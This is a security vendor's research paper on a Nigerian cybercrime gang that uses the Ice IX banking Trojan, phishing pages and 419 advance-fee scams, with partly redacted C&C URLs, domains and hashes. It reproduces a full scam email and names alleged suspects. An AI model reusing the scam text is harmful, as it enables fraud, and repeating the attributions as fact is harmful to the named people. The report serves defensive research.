ice 419': cybercriminals from nigeria use ice ix and … micro “ice 419” 3 domain ownership...

A Trend Micro Research Paper

“Ice 419”Cybercriminals from Nigeria Use Ice IX and the 419 Scam

Loucif Kharouni(Forward-Looking Threat Research Team)

Trend Micro | “Ice 419”

2

TREND MICRO LEGAL DISCLAIMER

The information provided herein is for general information and educational purposes only. It is not intended and should not be construed to constitute legal advice. The information contained herein may not be applicable to all situations and may not reflect the most current situation. Nothing contained herein should be relied on or acted upon without the benefit of legal advice based on the particular facts and circumstances presented and nothing herein should be construed otherwise. Trend Micro reserves the right to modify the contents of this document at any time without prior notice.

Translations of any material into other languages are intended solely as a convenience. Translation accuracy is not guaranteed nor implied. If any questions arise related to the accuracy of a translation, please refer to the original language official version of the document. Any discrepancies or differences created in the translation are not binding and have no legal effect for compliance or enforcement purposes.

Although Trend Micro uses reasonable efforts to include accurate and up-to-date information herein, Trend Micro makes no warranties or representations of any kind as to its accuracy, currency, or completeness. You agree that access to and use of and reliance on this document and the content thereof is at your own risk. Trend Micro disclaims all warranties of any kind, express or implied. Neither Trend Micro nor any party involved in creating, producing, or delivering this document shall be liable for any consequence, loss, or damage, including direct, indirect, special, consequential, loss of business profits, or special damages, whatsoever arising out of access to, use of, or inability to use, or in connection with the use of this document, or any errors or omissions in the content thereof. Use of this information constitutes acceptance for use in an “as is” condition.

Contents

Introduction ...........................................................................................................................................3

Ice IX as an Attack Vector...................................................................................................................3

C&C Servers ..........................................................................................................................................4

Connection to Nigeria ..........................................................................................................................5

Other Forms of Cybercrime ...............................................................................................................6

Phishing .....................................................................................................................................6

Nigerian Scams .........................................................................................................................8

Suspects ................................................................................................................................................11

Smith Samson .........................................................................................................................11

Peter Hollame .........................................................................................................................12

Peter Nzenwata .......................................................................................................................14

Organization Map ...............................................................................................................................16


3

Domain Ownership ............................................................................................................................17

Domains Registered with the Email Address, {BLOCKED}uglash @ gmail . com ......17

Domains Registered Under the name, “Erica Rubalcaba” ..............................................17

Domains Registered with the Email Address, {BLOCKED}h11 @ hotmail . com ......17

Domains Registered with the Email Address, {BLOCKED}th2 @ yahoo . com ..........18

Domain Registered with the Email Address, {BLOCKED}th11 @ yahoo . com .........18

Attribution ............................................................................................................................................19

Conclusion ...........................................................................................................................................22


4

Introduction

Consistent with our prediction for Africa in 2013 and our research paper on developments in the continent’s Internet infrastructure, this paper addresses cybercrime in the region, specifically a cybercrime gang that utilizes the banking Trojan, Ice IX.1 We were able to learn how one of these cybercrime operations works. There did not appear to be a specific targeted country but the targets included India, the United States, and Germany, among others.

Our research helped us determine that the cybercriminal gang is located in Nigeria, principally in Lagos, its most populous city. We were also able to identify certain key members of the operation.

In this research paper, we also describe our findings on the toolkit the group uses, domain ownership, and other related scams.

Ice IX as an Attack Vector

Ice IX is one of the most notorious and dangerous crimeware today. While known as the first generation of modified ZeuS variants, Ice IX is a reiteration of the banking Trojan after its code was leaked in underground forums.2 Ice IX is used to steal victims’ credentials or personally identifiable information (PII). These PII include user names and passwords for email, Facebook, and/or online bank accounts. Similar to ZeuS and SpyEye, Ice IX also uses a webinject file. This webinject file contains several lines of JavaScript and HTML code to mimic or create fake pop-up messages that ask for the users’ credentials while they access the sites of their online banks. The cybercriminals behind this operation used Ice IX to collect the following information for later use:

• Emailaddresses:Cybercriminals use victims’ email addresses to send out legitimate-looking spam and to have more convincing reply-to addresses.

• Bankaccountandcreditcardnumbers:Cybercriminals can abuse these to pay off their own bills. They can also be sold underground.

• Webmailaccountcredentials:Cybercriminals can use victims’ webmail accounts to send out spam with malicious attachments to further spread Ice IX or ZeuS variants.

1 Trend Micro Incorporated. (2013). “Security Threats to Business, the Digital Lifestyle, and the Cloud: Trend Micro Predictions for 2013 and Beyond.” Last accessed October 31, 2013, http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/spotlight-articles/sp-trend-micro-predictions-for-2013-and-beyond.pdf; Loucif Kharouni. (2013). “Africa: A New Safe Harbor for Cybercriminals?” Last accessed October 31, 2013, http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-africa.pdf.

2 Jasper Manuel. (September 2, 2011). TrendLabs Security Intelligence Blog. “ZeuS Gets Another Update.” Last accessed October 31, 2013, http://blog.trendmicro.com/trendlabs-security-intelligence/zeus-gets-another-update/.

http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/spotlight-articles/sp-trend-micro-predictions-for-2013-and-beyond.pdf

http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/spotlight-articles/sp-trend-micro-predictions-for-2013-and-beyond.pdf

http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-africa.pdf

http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-africa.pdf

http://blog.trendmicro.com/trendlabs-security-intelligence/zeus-gets-another-update/


5

C&C Servers

We located some of the cybercriminals’ command-and-control (C&C) servers using various techniques. We gathered all domains registered using the same email address, which has been known to belong to one of the cybercriminals. Another technique used was to look for more C&C servers after gaining access to the gang’s C&C control panel. We were also able to gather data on servers they either hijacked or owned based on the folder pattern, Whois records, and open source research. The following table shows some of the C&C servers we found.

C&C Servers

Hijacked Owned

http :// {BLOCKED}ver . be / web / adm / index . php http :// {BLOCKED} . co . za / web1 / web / adm / index . php

http :// {BLOCKED}malo . com / includes / colabo / web / adm / gate . php

http :// {BLOCKED} . co . za / web / adm / index . php

http :// {BLOCKED}king . com / web / adm / gate . php

Here are screenshots of the C&C communications that show the number of infected machines. Note that each C&C server only had a few bots.

Figure1:Infection count per C&C server


6

Connection to Nigeria

The infected machines in Nigeria were used to connect to Ice IX C&C servers. Based on the data gathered from the C&C logs, we discovered that the cybercriminals used the infected machines as SOCKS proxies to connect to different sites as well as other Ice IX control panels.

Figure2:Evidence that the cybercriminals used an infected machine as proxy to connect to a C&C server

Figure3:More machines in Nigeria used as proxies


7

It is still unclear why some cybercriminals used infected machines in Nigeria to carry out malicious activities. But we are absolutely certain that they operated from Nigeria based on various evidence gathered using techniques such as reviewing chat logs containing communications between different parties and tracking 4G connection subscriptions, which gave the IP address of the device they used. A possible explanation for this is that the cybercriminals may think using an infected machine is enough to cover their tracks, even though it is located in the same country.

Figure4:4G connection session

Other Forms of Cybercrime

Apart from using the Ice IX banking Trojan, some members of the gang appeared to be involved with various phishing and Nigerian or 419 scams. Phishing pages helped them gather various victims’ PII.

Phishing

The cybercriminals appeared to use at least three different phishing page types. One type impersonated Scottrade . com, the site of a privately owned American discount retail brokerage firm that offers both online and branch office services.


8

Figure5:Fake Scottrade site

Another phishing sample impersonated the popular Korean search engine site, Daum . net. A famous online dating site, Match . com, was also phished.

Figure6:Fake Daum . net log-in page


9

Figure7:Fake Match . com log-in page

Nigerian Scams

The cybercriminals also engaged in Nigerian or 419 scams, so named after the 419 Nigerian penal law that outlawed this particular type of fraud.3 This type of scam requires making an upfront payment in exchange for a reward for helping “officials” of Nigerian government ministries or the “family members” of political leaders.

Take a look at the following template of the email sent to several people, which caused them to reply with personal information such as their bank account details and copies of their IDs.

3 UnitedStatesDiplomaticMissiontoNigeria.“NigerianAdvanceFeeFraud(419)Resources.”LastaccessedOctober31,2013,http://nigeria.usembassy.gov/scam419.html.

http://nigeria.usembassy.gov/scam419.html


10

Sir/Madam,

I hope this proposal meets you in a good state of health.

IneedyourhelptotransferandinvestS$15,000,000.00thataccumulatedasundeclaredprofitmadebythisbranchHFCBankGhana Limited under my management.

All that is required to get the funds transferred out of here is to put yournameontheNon-investmentaccountholdingthefunds.ThispracticallymakesyouaNon-ResidentcustomerofHFCBank.

I will then guide you on how to apply for Closure of the Account andcredittransferofthefundstoyourdesignatedbankaccount.Youwillget40%ofthefundsforyourrole.

Ifyougetbacktomewithyourphysical,contactaddress,yourphoto id and direct telephone number, we will consummate the fundstransterwithinoneweek.

[email protected]

Sincerely,AmpahEdward

This email template is sent out using a spamming tool known as a “PHP mailer.” The cybercriminals hold several lists of email addresses for various countries. We have seen at least two of these lists with around 553,000 email addresses from Canada and 490,000 from the United States.

Figure8:PHP mailer screenshot


11

Some of the email addresses used in spamming include but are not limited to:

• {BLOCKED}ah @ aim . com

• {BLOCKED}arker001 @ aol . com

• {BLOCKED}arker001 @ live . com

• {BLOCKED}arker002 @ live . com

The cybercriminals also include an accompanying ID to make the email look more legitimate to potential victims.

Figure9:ID of supposed bank manager

Once the cybercriminals lure a victim in, they redirect him or her to an agent from the supposed bank to handle the money transfer. The cybercriminals even created a domain (hfconline - gh . com) that closely mimicked that of the Ghana Bank (hfcbank . com . gh). The fake domain is, however, only used for emailing purposes or for requesting victims to fill up a form and to send scanned copies of their IDs.

We noticed that the cybercriminals have been employing the same scam using different topics. One topic dealt with claiming a cash deposit belonging to a late family member. Another topic used the Gaddafi fortune as hook, specifically the line, “I am in control of US$15,000,000.00 deposited in my bank by the Libya, Gaddafi Family.” The cybercriminals also took advantage of users via a supposed “money transfer proposal from the Ghana Bank.”


12

What is the connection between using a banking Trojan like Ice IX and 419 scams? The activities described earlier such as operating and spreading Ice IX Trojans and installing PHP mailer are not operated by just one person but by a group of individuals who work together. The attribution section will describe each individual’s task and his or her involvement with the cybercriminal gang.

Suspects

The cybercriminals involved comprise a very large group mainly located in Lagos. Based on the information gathered, three key people have been identified.

Smith Samson

One of the cybercriminals who goes by the name, “Smith Samson,” possibly really Ofeoritse Abalagbeyi (Ofe), uses the following email addresses:

• {BLOCKED}th11 @ yahoo . com

• {BLOCKED}th2 @ yahoo . com (linked to the Facebook account, https :// www . facebook . com / {BLOCKED}se . {BLOCKED}beyi)

• {BLOCKED}th11 @ hotmail . com (linked to the Facebook account, https :// www . facebook . com / {BLOCKED}th . {BLOCKED} . 75)

Figure10:Facebook profile picture of Ofeoritse Abalagbeyi, also known as

“Smith Samson”


13

Ofe takes care of hosting, creating domains for, and configuring Ice IX and ZeuS C&C servers for the gang. He sends information to someone called “Peter Hollame,” one of his Facebook contacts who uses the email address, {BLOCKED}2 _ u2 @ yahoo . com.

Peter Hollame

Searching for the email address, {BLOCKED}2 _ u2 @ yahoo . com, led to a certain profile on a Nigerian forum called “nairaland . com.” This gave some information about the user’s location and gender.

Figure11:User profile found on nairaland . com

Figure12:Invisible . ir shows that {BLOCKED}2 _ u2 @ yahoo . com signed in from Lagos, Nigeria


14

We also discovered some information on invisible . ir, a site that displays the Yahoo!® Messenger status of any Yahoo! account holder. The site also shows where the user signs in from, which confirmed where the cybercriminal identified as “Peter Hollame” resides.

Figure13:{BLOCKED}2 _ u2 user pictures

The user pictures above from invisible . ir show us the avatars Hollame used over time. We found a similar picture to the one on his Facebook profile.


15

Figure14:Peter Hollame from Facebook account, https :// www . facebook . com / peter . hollame

Hollame, just like Ofe, also uploads ZeuS and Ice IX malware to the gang’s C&C servers (both hijacked and owned) and installs the control panel using the ZeuS 2.0.8.9 toolkit provided by Ofe. In return, Hollame provides Ofe some mailer tools and credit card numbers.

Hollame acts as middle man and communicates and works with another individual, Uzochukwu Nzenwata, also known as “Peter Nzenwata.”

Peter Nzenwata

Based on our investigation, Hollame appears to also provide mailer tools to a certain “Peter Nzenwata” so he can send out Nigerian scam emails. Hollame also sends credit card information to Nzenwata to pay for the latter’s phone and 4G connection bills. We also learned that Nzenwata moved to Ghana in 2008 but is currently back in Nigeria and is using 4G 1Mbps wireless access. It appears that Nzenwata heavily relies on his peers, as he has no control over the C&C servers, the mailer tools, and the email list for spamming purposes.

Below are the email addresses Nzenwata appears to use:

• {BLOCKED}er2005 @ yahoo . com

• {BLOCKED}eter @ yahoo . com (linked to the Facebook account, https :// www . facebook . com / {BLOCKED}kwuInnocent)


16

Figure15:Uzochukwu Nzenwata, also known as “Peter Nzenwata”

Figure16:Main people involved in the scams


17

Organization Map


18

Domain Ownership

The Ice IX domains are all registered under the top-level domain (TLD), co . za, which is located in South Africa. Note that most of the domains listed below refer to C&C servers.

Domains Registered with the Email Address, {BLOCKED}uglash @ gmail . com

• {BLOCKED}dand . co . za

• {BLOCKED}ntfighting . co . za

• {BLOCKED}ls . co . za

• {BLOCKED}k . co . za

• {BLOCKED}regh . co . za

Domains Registered Under the name, “Erica Rubalcaba”

• {BLOCKED}dew . net

• {BLOCKED}odand . co . za

• {BLOCKED}antfighting . co . za

• {BLOCKED}antfighting . net

• {BLOCKED}opls . co . za

• {BLOCKED}lock . co . za


Domains Registered with the Email Address, {BLOCKED}h11 @ hotmail . com

• {BLOCKED} - sa . com

• {BLOCKED}cng . net

• {BLOCKED}online . org

• {BLOCKED}w1 . co . za


19

Domains Registered with the Email Address, {BLOCKED}th2 @ yahoo . com

• {BLOCKED}aycbnk . net

• {BLOCKED}ghana . biz

• {BLOCKED}markcop . org

• {BLOCKED}stenderboard . com

• {BLOCKED}ample . com

• {BLOCKED}lsecuritycompany . org

• {BLOCKED}lx . co

• {BLOCKED}ls . info

• {BLOCKED}nesp . net

• {BLOCKED}inesp12 . com

• {BLOCKED}perweels . com

• {BLOCKED}qw . com

• {BLOCKED}d - nation . net

• {BLOCKED}dnation . me

• {BLOCKED}ation . mobi

Domain Registered with the Email Address, {BLOCKED}th11 @ yahoo . com

• {BLOCKED}liacredithouse . net


20

Attribution

We discovered the following list of URLs related to how the cybercriminals operate and manage their C&C servers.

• http :// {BLOCKED}er . be / web / adm / index . php

• http :// {BLOCKED}lo . com / includes / colabo / web / adm / gate . php

• http :// www . {BLOCKED}peruanskef . se / images / adm / index . php

• http :// {BLOCKED}ra . com / adm / gate . php

• http :// {BLOCKED}b . com / img / adm / gate . php

• http :// {BLOCKED}lo . com / includes / colabo / web / adm / gate . php

• http :// {BLOCKED} entialsservices . com / forms / adm / gate . php

• http :// {BLOCKED}under . biz / html / adm / gate . php

• http :// {BLOCKED}012mne . com / plugins / adm / gate . php

• http :// www. {BLOCKED}free . info / jss / adm / gate . php

• http :// {BLOCKED}essionalsolutions . com / contactus / adm / gate . php

• http :// www. {BLOCKED}seoul . tk / java / adm / gate . php

• http :// {BLOCKED}wi . it / language / adm / gate . php

• http :// {BLOCKED}ofttraining . tk / olive / adm / gate . php

• http :// {BLOCKED} . {BLOCKED} . 205 . 226 / ~inshowro / web / adm / gate . php

• http :// {BLOCKED}ls . co . za / 1 / gate . php

• http :// {BLOCKED}regh . co . za / web / config / index . php

• http :// {BLOCKED}odand . co . za / web / adm / index . php

• http :// {BLOCKED}ntfighting . co . za / web / adm / index . php

• http :// {BLOCKED}tfighting . net / web / adm / gate . php

• http :// {BLOCKED}ok . co . za / web1 / adm / index . php


21

• http :// {BLOCKED}ok . co . za / web2 / adm / index . php

• http :// {BLOCKED}1 . co . za / web1 / web / adm / index . php

• http :// {BLOCKED}1 . co . za / web / adm / index . php

• http :// {BLOCKED}ing . com / web / adm / gate . php

• http :// www . {BLOCKED}nlog . tk / forum / adm / index . php

• http :// {BLOCKED}agu . tk / web / adm / index . php

• http :// {BLOCKED}1ok . co . za / serv / cp . php


• {BLOCKED}tfighting . co . za

• {BLOCKED}pls . co . za

• {BLOCKED}ck . co . za


• {BLOCKED}sdew . net


• {BLOCKED}antfighting . co . za

• {BLOCKED}ntfighting . net

• {BLOCKED}pls . co . za

• {BLOCKED}ck . co . za

• {BLOCKED}egh . co . za

• {BLOCKED}sa . com

• {BLOCKED}ng . net

• {BLOCKED}line . org

• {BLOCKED}1 . co . za

• {BLOCKED}ycbnk . net


22

• {BLOCKED}hana . biz

• {BLOCKED}arkcop . org

• {BLOCKED}tenderboard . com

• {BLOCKED}le . com

• {BLOCKED}alsecuritycompany . org

• {BLOCKED}lx . co

• {BLOCKED}ls . info

• {BLOCKED}sp . net

• {BLOCKED}sp12 . com

• {BLOCKED}rweels . com

• {BLOCKED}w . com

• {BLOCKED} - nation . net

• {BLOCKED}nation . me

• {BLOCKED}nation . mobi

• {BLOCKED}liacredithouse . net

Below is a list of the malware samples that appear to connect to the related C&C infrastructure.

Malware Samples That Access the C&C Infrastructure

Detection Name MD5 Hash

TSPY_ZBOT.NEKd144c261790a8b2bb10f465deb97d7a552973c550ebc3977fc816f417d9d8eed318f100792439359654356389ec5a34a

TSPY_ZBOT.UZS 78e07300b8355f5b046c5159fbce4d88

TSPY_ZBOT.SML9 8957b362028d8ddc378aecaaa97a04750ab85fa27224a9be29d3ab4b3f14797a


23

Conclusion

Dealing with Africa as a new cybercrime harbor is a struggle that threat researchers now face. The three main members mentioned in this research paper are still at large and are continuing their operations. They are part of a larger group as shown by the organization map, which only represents a small portion of the whole underground community in Africa involved in this type of business. Several smaller 419 groups also engaged in this lucrative business. These individuals appear to be unconcerned with regard to covering their tracks because they think it would be hard for authorities to arrest them.

It is interesting to see that these cybercriminals share tasks and specialize in specific areas such as hosting and creating domains and running the botnet. The other tasks concentrated on looking for email addresses, working on the PHP mailers, and launching spam campaigns. Infiltrating different C&C servers and being able to search through their logs helped us identify some of the cybercriminals. We were also able to find other C&C servers that the bad guys used. These perpetrators appear to act swiftly as soon as their C&C servers get shut down—they are always looking for vulnerable servers to install Ice IX Trojans on while creating new domains for the same reasons. They are well-organized and know their respective tasks.

We noted that the perpetrators looked for the following:

• Vulnerable domains/servers to hijack and install banking Trojans on

• Vulnerable domains/servers to hijack and install PHP mailers on

• Fresh lists of email addresses to spam

There is no limit on how cybercriminals work with their peers. They appear to willingly share what they have and, in return, receive the information they need such as a list of email addresses they call “leads” and an available and working PHP mailer.

The number of cybercriminal activities targeting or originating from Africa will continue to rise. For instance, the Nigerian scam is still an attractive business, especially for jobless youth. In addition, Ice IX has been a welcome addition to cybercriminal operations for its reliability and stability.

Trend Micro Incorporated, a global leader in security software, strives to make theworldsafeforexchangingdigital information.Ourinnovativesolutionsforconsumers,businesses and governments provide layered content security to protect informationonmobiledevices,endpoints,gateways,serversandthecloud.Allofoursolutionsarepowered by cloud-based global threat intelligence, the Trend Micro™ Smart Protection Network™,andaresupportedbyover1,200threatexpertsaroundtheglobe.Formoreinformation,visitwww.trendmicro.com.

©2013byTrendMicro, Incorporated.All rights reserved.TrendMicroand theTrendMicrot-balllogoaretrademarksorregisteredtrademarksofTrendMicro,Incorporated.Allotherproductorcompanynamesmaybe trademarksor registered trademarksoftheir owners.

10101 N. De Anza Blvd.Cupertino, CA 95014

U.S. toll free: 1 +800.228.5651Phone: 1 +408.257.1500Fax: 1 +408.257.2003

http://www.trendmicro.com/us/index.html

ice 419': cybercriminals from nigeria use ice ix and … micro “ice 419” 3 domain ownership...

Documents